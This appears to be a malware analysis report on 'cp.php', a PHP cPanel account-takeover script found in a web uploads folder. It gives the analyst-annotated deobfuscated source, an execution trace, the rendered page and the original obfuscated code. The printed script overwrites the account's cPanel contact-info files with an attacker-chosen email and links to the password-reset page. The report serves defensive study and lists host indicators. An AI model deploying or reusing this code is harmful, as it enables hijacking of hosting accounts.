PHP Malware Analysis

cp.php

md5: 2219eedf7248f43bc6104bfeb5303cd7


Deobfuscated PHP code

<?php

// Analyst notes (defensive): the script renders a fake "Crack Cpanel" form and, on
// submit, overwrites the web-server user's cPanel contact-info files with an
// attacker-chosen e-mail, then links to the cPanel password-reset page on port 2083.
// Host-level indicators: unexpected writes to /home/<user>/.cpanel/contactinfo and
// /home/<user>/.contactinfo with content "email:<address>"; a PHP file whose output
// carries the title "X - Crack". Variable names are the typical I/1/l obfuscation
// style; $IIIIIIIIIIlI (REMOTE_ADDR), $IIIIIIIIIlIl and $IIIIIIIIIlI1 are assigned
// but never read in this listing.

// Silences every warning, so a failed fopen()/fwrite() below leaves no trace in logs.
error_reporting(0);
// Static lure page: a single POST form (fields "email" and "submit") back to the same URL.
echo "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"UTF-8\">\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n    <title>X - Crack</title>\n</head>\n<style>\n    body {\n        background: black;\n        color: #e2e2e2;\n    }\n    .container {\n        text-align:center;\n        top: 10px;\n    }\n\n    .img-logo {\n        height: 160px;\n        border-radius: 50%;\n        border: 2px solid red;\n    }\n\n    h3 {\n        text-align: center;\n        font-family: sans-serif;\n        animation: color-change 1s infinite;\n        font-size: 24px;\n    }\n\n    @keyframes color-change {\n        0% { color: red; }\n        50% { color: blue; }\n        100% { color: red; }\n    }\n\n    .draw {\n        height:45px;\n    }\n    \n    .wis {\n        height: 25px;\n    }\n    \n    .logo{ \n        height: 120px;\n    }\n    \n    input[type=\"email\"] { \n        border-radius: 5px; \n        border-bottom-color: red; \n        border-top-color: red; \n        border-right-color: red;\n        border-left-color: red;\n        padding: 10;\n    }\n\n    input[type=\"submit\"] {\n        border-radius: 5px; \n        border-bottom-color: red; \n        border-top-color: red; \n        border-right-color: red;\n        border-left: red;\n        padding: 10;\n    }\n</style>\n<body>\n    <div class=\"container\">\n        <br>\n        <br>\n        <img src=\"https://l.top4top.io/p_2304qtye40.png\" class=\"img-logo\">\n        <h3>Crack Cpanel</h3>\n        <form action=\"#\" method=\"post\">\n            <input type=\"email\" name=\"email\" placeholder=\"Email reset\"/>\n            <input type=\"submit\" name=\"submit\" value=\"Gas\"/>\n        </form>\n        <br>\n        <pre>X - MrG3P5 &copy; 2K22</pre>\n    </div>\n</body>\n</html>";
// System account the PHP process runs as (the trace shows 'osboxes'); used to build /home/<user>/ paths.
$IIIIIIIIIIII = get_current_user();
// Taken from the request Host header; client-controlled, and later echoed unescaped into an href.
$IIIIIIIIIII1 = $_SERVER["HTTP_HOST"];
// Client IP; assigned but never used below.
$IIIIIIIIIIlI = getenv("REMOTE_ADDR");
if (isset($_POST["submit"])) {
    // Submitted address is used verbatim — no validation, no escaping.
    $email = $_POST["email"];
    $IIIIIIIIIIl1 = "email:" . $email;
    // Overwrites (mode "w" truncates) the account's cPanel contact-info file with the
    // submitted address. NOTE(review): presumably this is the address cPanel's
    // resetpass flow (linked below) sends reset mail to — confirm against the cPanel version.
    $IIIIIIIIII1I = fopen("/home/" . $IIIIIIIIIIII . "/.cpanel/contactinfo", "w");
    fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
    fclose($IIIIIIIIII1I);
    // Same payload written to a second location in the home directory.
    $IIIIIIIIII1I = fopen("/home/" . $IIIIIIIIIIII . "/.contactinfo", "w");
    fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1);
    fclose($IIIIIIIIII1I);
    // Unused in this listing (the original concatenates $IIIIIIIIIlIl into the href; here it is hard-coded).
    $IIIIIIIIIlIl = "https://";
    $IIIIIIIIIlI1 = "2083";
    // <host>:2083/resetpass?start=1 — the cPanel password-reset entry point on the current host.
    $IIIIIIIIIllI = $IIIIIIIIIII1 . ":2083/resetpass?start=1";
    // Re-reads the file just written; a false result means the write was not permitted.
    // The "@" hides the warning that a failed read would otherwise emit.
    $read_named_conf = @file("/home/" . $IIIIIIIIIIII . "/.cpanel/contactinfo");
    if (!$read_named_conf) {
        // Indonesian: roughly "no access was granted".
        echo "<center><h1>Bruh gk dikasih akses</h1><br><br> </pre></center>";
    } else {
        // Indonesian: roughly "copy this, boss, go ahead"; "SALIN TEXT" = "copy text".
        echo "<center>SALIN INI STER TRUZZ GASS <br><br></center>";
        // Shows the system username with a copy-to-clipboard button (username is the
        // login for the reset page). Value is inserted into HTML without escaping.
        echo "<center><input type=\"text\" value=\"" . $IIIIIIIIIIII . "\" id=\"user\"> <button onclick=\"username()\">SALIN TEXT</button></center> <script>function username() { var copyText = document.getElementById(\"user\"); copyText.select(); document.execCommand(\"copy\"); } </script> ";
        // Link to the reset page; $IIIIIIIIIllI derives from HTTP_HOST and is not escaped.
        echo "<br/><center><a  target=\"_blank\" href=\"https://" . $IIIIIIIIIllI . "\"><img class=\"wis\"src=\"https://i.ibb.co/hgKSY0K/cooltext317065123408510.png\"></a><br><br></center>";
    }
}

Execution traces

data/traces/2219eedf7248f43bc6104bfeb5303cd7_trace-1676246652.3596.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:04:38.257451]
1	0	1	0.000138	393464
1	3	0	0.000327	414840	{main}	1		/var/www/html/uploads/cp.php	0	0
2	4	0	0.000344	414840	error_reporting	0		/var/www/html/uploads/cp.php	3	1	0
2	4	1	0.000359	414880
2	4	R			22527
2	5	0	0.000374	414840	get_current_user	0		/var/www/html/uploads/cp.php	3	0
2	5	1	0.000410	414880
2	5	R			'osboxes'
1		A						/var/www/html/uploads/cp.php	3	$IIIIIIIIIIII = 'osboxes'
1		A						/var/www/html/uploads/cp.php	3	$IIIIIIIIIII1 = 'localhost'
2	6	0	0.000449	414880	getenv	0		/var/www/html/uploads/cp.php	3	1	'REMOTE_ADDR'
2	6	1	0.000463	414952
2	6	R			'127.0.0.1'
1		A						/var/www/html/uploads/cp.php	3	$IIIIIIIIIIlI = '127.0.0.1'
1	3	1	0.000488	414920
			0.000515	314400
TRACE END   [2023-02-12 22:04:38.257857]


Generated HTML code

<html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>X - Crack</title>
<style>
    body {
        background: black;
        color: #e2e2e2;
    }
    .container {
        text-align:center;
        top: 10px;
    }

    .img-logo {
        height: 160px;
        border-radius: 50%;
        border: 2px solid red;
    }

    h3 {
        text-align: center;
        font-family: sans-serif;
        animation: color-change 1s infinite;
        font-size: 24px;
    }

    @keyframes color-change {
        0% { color: red; }
        50% { color: blue; }
        100% { color: red; }
    }

    .draw {
        height:45px;
    }
    
    .wis {
        height: 25px;
    }
    
    .logo{ 
        height: 120px;
    }
    
    input[type="email"] { 
        border-radius: 5px; 
        border-bottom-color: red; 
        border-top-color: red; 
        border-right-color: red;
        border-left-color: red;
        padding: 10;
    }

    input[type="submit"] {
        border-radius: 5px; 
        border-bottom-color: red; 
        border-top-color: red; 
        border-right-color: red;
        border-left: red;
        padding: 10;
    }
</style></head>

<body>
    <div class="container">
        <br>
        <br>
        <img src="https://l.top4top.io/p_2304qtye40.png" class="img-logo">
        <h3>Crack Cpanel</h3>
        <form action="#" method="post">
            <input type="email" name="email" placeholder="Email reset">
            <input type="submit" name="submit" value="Gas">
        </form>
        <br>
        <pre>X - MrG3P5 © 2K22</pre>
    </div>

</body></html>

Original PHP code

<?php
 goto UBEmK; UBEmK: ?>
<?php  goto FpZ9w; FpZ9w: error_reporting(0); goto mqNz1; WC3Wz: $IIIIIIIIIIlI = getenv("\122\105\115\117\124\105\137\101\104\104\122"); goto QZXfX; QZXfX: if (isset($_POST["\163\165\142\155\151\164"])) { $email = $_POST["\x65\155\x61\151\x6c"]; $IIIIIIIIIIl1 = "\145\155\x61\x69\154\x3a" . $email; $IIIIIIIIII1I = fopen("\x2f\x68\157\155\145\57" . $IIIIIIIIIIII . "\x2f\56\x63\x70\x61\156\x65\x6c\57\143\157\x6e\164\x61\143\x74\151\156\x66\x6f", "\x77"); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I); $IIIIIIIIII1I = fopen("\x2f\150\157\x6d\x65\x2f" . $IIIIIIIIIIII . "\57\56\143\x6f\156\x74\x61\143\x74\x69\x6e\146\x6f", "\167"); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I); $IIIIIIIIIlIl = "\150\164\x74\x70\163\x3a\x2f\57"; $IIIIIIIIIlI1 = "\62\x30\70\x33"; $IIIIIIIIIllI = $IIIIIIIIIII1 . "\72\x32\60\70\x33\x2f\x72\145\x73\x65\164\x70\141\163\x73\77\163\x74\x61\162\164\x3d\x31"; $read_named_conf = @file("\57\x68\x6f\155\x65\57" . $IIIIIIIIIIII . "\57\56\x63\160\x61\x6e\x65\x6c\x2f\x63\157\x6e\164\141\143\164\x69\x6e\146\157"); if (!$read_named_conf) { echo "\x3c\143\145\156\164\145\x72\x3e\x3c\x68\x31\x3e\102\162\165\150\x20\147\153\x20\144\151\153\x61\x73\x69\150\x20\x61\153\163\x65\163\74\x2f\x68\61\x3e\74\x62\x72\76\74\x62\x72\x3e\40\74\x2f\x70\x72\x65\76\x3c\x2f\x63\145\156\x74\145\162\x3e"; } else { echo "\x3c\143\145\156\x74\x65\162\x3e\x53\101\x4c\x49\x4e\x20\111\116\x49\40\123\x54\x45\x52\40\124\122\125\x5a\132\x20\107\101\x53\123\40\x3c\x62\x72\x3e\74\x62\x72\76\x3c\57\143\145\156\x74\x65\162\x3e"; echo "\x3c\143\145\x6e\x74\145\x72\x3e\x3c\x69\156\x70\165\164\x20\164\x79\160\x65\75\42\164\145\x78\164\x22\40\166\141\x6c\x75\x65\x3d\x22" . $IIIIIIIIIIII . 
"\x22\x20\x69\x64\75\42\x75\163\145\162\42\x3e\x20\x3c\142\165\164\x74\x6f\156\x20\157\x6e\143\x6c\x69\x63\153\x3d\42\165\x73\x65\162\x6e\x61\x6d\145\x28\x29\x22\76\x53\x41\114\x49\116\x20\x54\x45\x58\124\74\x2f\142\165\x74\164\x6f\x6e\x3e\74\57\143\145\x6e\164\145\162\76\x20\74\163\x63\x72\151\x70\164\x3e\146\165\x6e\x63\x74\151\x6f\156\40\165\x73\x65\162\x6e\x61\155\145\50\x29\x20\x7b\x20\166\141\162\x20\143\x6f\x70\x79\124\145\170\x74\40\x3d\x20\144\157\x63\x75\155\x65\x6e\x74\56\x67\x65\164\x45\x6c\145\155\145\156\164\102\x79\x49\x64\x28\42\x75\163\145\x72\42\51\x3b\40\x63\157\x70\171\124\145\x78\164\56\163\145\x6c\x65\x63\x74\50\51\x3b\40\144\x6f\x63\165\x6d\145\156\x74\x2e\x65\x78\145\x63\103\157\155\155\141\156\x64\x28\x22\143\157\x70\x79\x22\51\73\40\175\40\x3c\57\x73\143\x72\151\160\164\x3e\x20"; echo "\74\x62\162\x2f\76\x3c\143\145\x6e\164\145\162\x3e\x3c\141\x20\x20\x74\x61\x72\x67\145\x74\75\42\x5f\x62\x6c\141\x6e\x6b\42\40\150\162\x65\146\75\x22" . $IIIIIIIIIlIl . '' . $IIIIIIIIIllI . 
"\42\x3e\x3c\151\155\x67\40\x63\154\141\x73\x73\75\x22\x77\151\x73\x22\163\x72\x63\x3d\42\150\164\x74\160\163\72\57\x2f\x69\56\151\x62\x62\56\143\157\57\150\x67\113\x53\131\60\x4b\x2f\143\157\x6f\154\x74\x65\x78\164\63\61\x37\60\x36\65\x31\62\x33\64\60\70\65\x31\x30\56\160\x6e\147\42\x3e\74\57\141\x3e\x3c\x62\x72\x3e\74\142\x72\x3e\74\x2f\143\145\156\x74\x65\162\x3e"; } } goto YlfR1; quCDA: $IIIIIIIIIIII = get_current_user(); goto E05zk; mqNz1: echo "\x3c\41\104\117\103\x54\x59\120\105\40\x68\x74\x6d\x6c\x3e\xa\x3c\x68\164\x6d\154\x20\154\141\156\x67\x3d\x22\145\156\x22\x3e\12\74\x68\145\141\144\x3e\12\x20\40\40\x20\74\x6d\x65\164\141\40\x63\x68\141\162\x73\x65\164\75\x22\x55\x54\106\55\70\42\76\xa\40\x20\40\x20\x3c\x6d\145\164\141\x20\150\x74\x74\160\55\145\161\x75\x69\166\75\42\x58\55\x55\101\55\103\157\155\x70\141\164\x69\x62\x6c\x65\x22\40\143\x6f\x6e\164\x65\x6e\x74\75\x22\111\105\x3d\x65\144\x67\145\42\76\12\40\40\40\40\x3c\155\x65\x74\141\x20\156\141\x6d\x65\75\42\x76\x69\x65\x77\160\x6f\x72\x74\x22\x20\x63\x6f\156\164\x65\156\x74\75\x22\x77\x69\x64\x74\150\75\144\145\166\x69\x63\x65\x2d\x77\x69\144\x74\150\54\x20\151\156\x69\164\151\141\x6c\55\x73\x63\x61\x6c\x65\x3d\x31\x2e\60\42\x3e\12\40\x20\40\40\74\155\145\x74\x61\x20\150\164\x74\160\55\145\x71\x75\x69\166\75\42\103\x6f\156\x74\145\156\164\x2d\124\x79\160\x65\42\x20\143\x6f\156\x74\x65\156\x74\x3d\42\164\x65\x78\164\x2f\x68\x74\155\154\x3b\x20\143\x68\x61\162\x73\145\164\75\165\x74\x66\x2d\70\42\x20\x2f\x3e\xa\40\40\x20\40\x3c\x74\x69\164\x6c\x65\76\x58\40\x2d\x20\x43\x72\x61\143\x6b\74\x2f\x74\151\164\x6c\x65\76\xa\74\57\150\x65\141\x64\76\12\x3c\163\164\171\154\145\76\12\x20\40\40\40\142\x6f\x64\x79\40\173\12\x20\x20\x20\x20\x20\x20\x20\40\x62\141\x63\x6b\147\162\157\x75\156\144\72\x20\142\154\x61\x63\x6b\73\12\40\40\40\40\x20\40\40\40\x63\x6f\x6c\x6f\x72\72\x20\x23\x65\x32\145\62\145\x32\73\12\40\x20\x20\40\175\12\x20\40\x20\40\56\143\157\156\x74\x61\151\x6e\x65\162\40\173\12\40\x20\x20\40\40\40\x20\
40\x74\145\x78\164\x2d\141\x6c\x69\147\156\x3a\x63\x65\156\164\145\x72\73\12\x20\x20\x20\40\x20\40\40\40\x74\x6f\160\x3a\x20\61\60\160\x78\73\12\x20\40\40\40\x7d\12\12\x20\40\40\x20\x2e\151\155\147\x2d\x6c\157\x67\157\40\173\xa\40\x20\x20\40\x20\40\40\40\150\x65\x69\x67\x68\x74\x3a\40\x31\x36\60\x70\x78\x3b\12\x20\40\x20\x20\x20\40\40\x20\142\x6f\162\144\x65\x72\55\x72\141\144\151\165\x73\72\40\65\x30\45\73\xa\40\40\x20\40\x20\x20\40\x20\x62\157\x72\x64\145\x72\x3a\x20\x32\160\170\40\163\157\x6c\x69\144\40\x72\145\144\73\12\x20\40\x20\40\x7d\xa\xa\40\x20\40\40\x68\63\x20\x7b\12\x20\x20\40\40\x20\x20\x20\40\x74\x65\x78\164\x2d\x61\154\x69\x67\156\x3a\x20\143\x65\x6e\x74\145\162\73\xa\40\x20\x20\x20\40\40\40\x20\146\x6f\156\x74\x2d\x66\141\155\x69\x6c\x79\72\x20\x73\x61\156\163\x2d\163\x65\162\151\x66\x3b\xa\x20\40\40\40\x20\x20\x20\40\141\156\x69\x6d\141\x74\x69\x6f\x6e\72\40\143\157\154\x6f\x72\x2d\x63\x68\x61\156\x67\145\x20\61\163\x20\151\156\146\151\156\151\164\145\x3b\xa\40\40\x20\x20\40\x20\40\x20\146\x6f\156\x74\55\x73\x69\x7a\145\72\x20\x32\64\160\x78\x3b\12\x20\40\x20\x20\x7d\12\12\x20\x20\40\40\100\x6b\x65\x79\x66\162\x61\155\x65\x73\x20\143\x6f\154\157\x72\55\143\150\141\x6e\x67\x65\40\x7b\xa\40\40\40\40\40\x20\x20\40\x30\45\x20\x7b\x20\x63\157\x6c\157\x72\x3a\40\x72\x65\x64\73\40\175\xa\40\x20\x20\40\x20\40\x20\x20\x35\60\45\40\173\40\143\x6f\154\157\x72\x3a\x20\142\x6c\165\x65\x3b\40\x7d\xa\x20\40\x20\40\40\x20\x20\x20\61\x30\60\x25\x20\173\40\x63\x6f\x6c\157\162\x3a\40\x72\145\x64\x3b\40\x7d\xa\40\x20\x20\x20\175\12\12\40\x20\40\40\56\x64\162\x61\167\x20\x7b\12\40\40\x20\40\x20\40\40\40\x68\x65\151\147\150\x74\x3a\64\x35\160\x78\x3b\12\x20\40\40\x20\175\12\40\x20\40\x20\12\x20\x20\x20\40\x2e\x77\151\x73\x20\x7b\xa\40\x20\40\40\x20\40\x20\40\150\x65\151\147\150\x74\72\40\62\x35\x70\x78\73\xa\x20\40\x20\40\175\12\40\x20\40\x20\xa\40\x20\40\x20\56\154\157\147\157\x7b\x20\12\x20\x20\x20\x20\x20\x20\40\40\x68\x65\151\147\150\164\x3a\40\x31\62\x30\x70\170\73\
12\x20\x20\40\40\175\xa\x20\40\x20\40\12\40\x20\x20\x20\x69\x6e\160\x75\164\133\x74\171\160\145\x3d\42\145\x6d\141\x69\x6c\42\135\x20\173\x20\12\40\40\40\40\40\x20\40\x20\142\x6f\162\x64\145\162\x2d\x72\141\x64\x69\x75\163\72\40\x35\160\x78\x3b\40\12\40\40\x20\x20\x20\x20\40\40\x62\x6f\x72\144\x65\x72\x2d\142\x6f\x74\164\x6f\155\55\x63\157\154\x6f\162\72\40\162\x65\x64\73\x20\xa\40\x20\40\x20\40\40\40\40\142\157\162\x64\x65\x72\55\164\x6f\160\x2d\x63\x6f\154\157\x72\x3a\40\x72\145\144\x3b\x20\12\40\x20\x20\40\40\40\40\x20\x62\x6f\x72\x64\145\x72\55\x72\151\147\150\x74\x2d\143\157\154\157\162\x3a\40\x72\x65\x64\x3b\xa\x20\x20\x20\40\40\40\40\40\142\x6f\162\144\145\162\55\154\145\x66\164\x2d\x63\157\x6c\157\162\72\x20\162\x65\x64\x3b\12\x20\40\x20\40\40\x20\x20\40\x70\x61\x64\144\x69\156\x67\72\40\x31\x30\73\xa\x20\40\40\40\175\12\xa\40\x20\x20\x20\151\x6e\x70\x75\x74\x5b\x74\x79\x70\x65\75\x22\163\165\x62\x6d\x69\164\x22\135\40\173\xa\40\40\x20\40\40\40\x20\x20\x62\157\x72\x64\x65\x72\55\x72\141\x64\151\x75\163\72\40\65\160\170\x3b\40\12\x20\40\40\40\40\40\x20\x20\142\157\162\144\145\x72\x2d\142\x6f\x74\x74\157\155\55\143\x6f\154\157\162\x3a\x20\x72\x65\144\73\40\12\40\40\40\x20\x20\40\x20\x20\x62\157\x72\x64\145\x72\x2d\x74\157\160\55\143\157\154\157\x72\x3a\40\x72\x65\x64\73\40\12\x20\x20\x20\40\40\x20\x20\40\142\157\x72\144\145\x72\55\162\151\x67\x68\164\x2d\x63\x6f\x6c\x6f\162\72\40\x72\x65\x64\x3b\xa\x20\40\x20\x20\x20\40\40\x20\x62\157\x72\144\x65\x72\55\x6c\x65\x66\164\72\40\162\145\144\x3b\12\40\40\40\x20\x20\40\40\x20\160\x61\x64\x64\x69\156\147\72\40\x31\x30\73\xa\40\x20\x20\x20\x7d\12\x3c\x2f\x73\164\x79\154\145\x3e\xa\x3c\x62\x6f\144\x79\76\xa\40\x20\40\40\74\x64\x69\166\40\x63\x6c\141\x73\163\x3d\x22\x63\157\x6e\164\x61\151\156\x65\x72\42\x3e\xa\40\40\x20\40\x20\40\x20\40\x3c\x62\x72\x3e\xa\x20\40\40\x20\x20\x20\40\40\x3c\142\x72\x3e\xa\40\x20\x20\x20\40\40\x20\40\74\151\155\147\40\x73\x72\143\x3d\42\150\x74\x74\160\x73\72\x2f\57\154\56\164\x6f\160\64\16
4\x6f\x70\56\x69\x6f\x2f\x70\x5f\62\63\x30\64\161\x74\x79\145\x34\60\x2e\160\156\147\42\x20\x63\x6c\141\x73\163\x3d\x22\x69\x6d\x67\x2d\x6c\x6f\147\x6f\42\76\xa\x20\x20\40\x20\x20\40\40\40\x3c\150\x33\x3e\103\x72\141\143\x6b\40\103\160\x61\x6e\x65\154\74\57\x68\63\x3e\12\40\x20\x20\x20\x20\x20\x20\40\x3c\146\157\162\x6d\40\141\x63\164\151\x6f\x6e\75\42\43\x22\x20\x6d\145\x74\x68\157\x64\75\x22\x70\x6f\x73\x74\42\x3e\12\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\74\x69\156\x70\x75\164\40\x74\171\160\145\75\42\145\x6d\x61\x69\154\42\40\156\x61\x6d\x65\x3d\42\145\x6d\141\151\154\x22\x20\160\154\141\x63\x65\150\157\154\144\145\x72\x3d\42\105\x6d\141\x69\x6c\x20\162\x65\x73\145\x74\42\x2f\x3e\xa\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\x3c\151\x6e\160\x75\164\40\164\x79\x70\x65\75\42\163\165\x62\155\151\x74\42\40\156\x61\155\x65\75\x22\x73\165\142\155\151\x74\x22\x20\166\141\x6c\165\145\x3d\42\x47\x61\163\42\57\x3e\12\x20\x20\x20\40\x20\40\x20\x20\74\x2f\146\x6f\162\155\x3e\12\40\40\x20\40\40\40\40\x20\74\x62\162\x3e\xa\x20\40\40\x20\x20\x20\x20\x20\74\160\162\145\x3e\130\x20\55\40\115\x72\x47\63\x50\65\x20\x26\x63\x6f\160\171\73\40\x32\x4b\62\62\74\x2f\160\162\x65\x3e\12\x20\40\x20\x20\x3c\x2f\x64\x69\166\76\xa\x3c\57\142\157\x64\171\76\12\74\57\x68\x74\155\x6c\x3e"; goto quCDA; E05zk: $IIIIIIIIIII1 = $_SERVER["\x48\124\x54\x50\x5f\110\117\123\x54"]; goto WC3Wz; YlfR1: ?>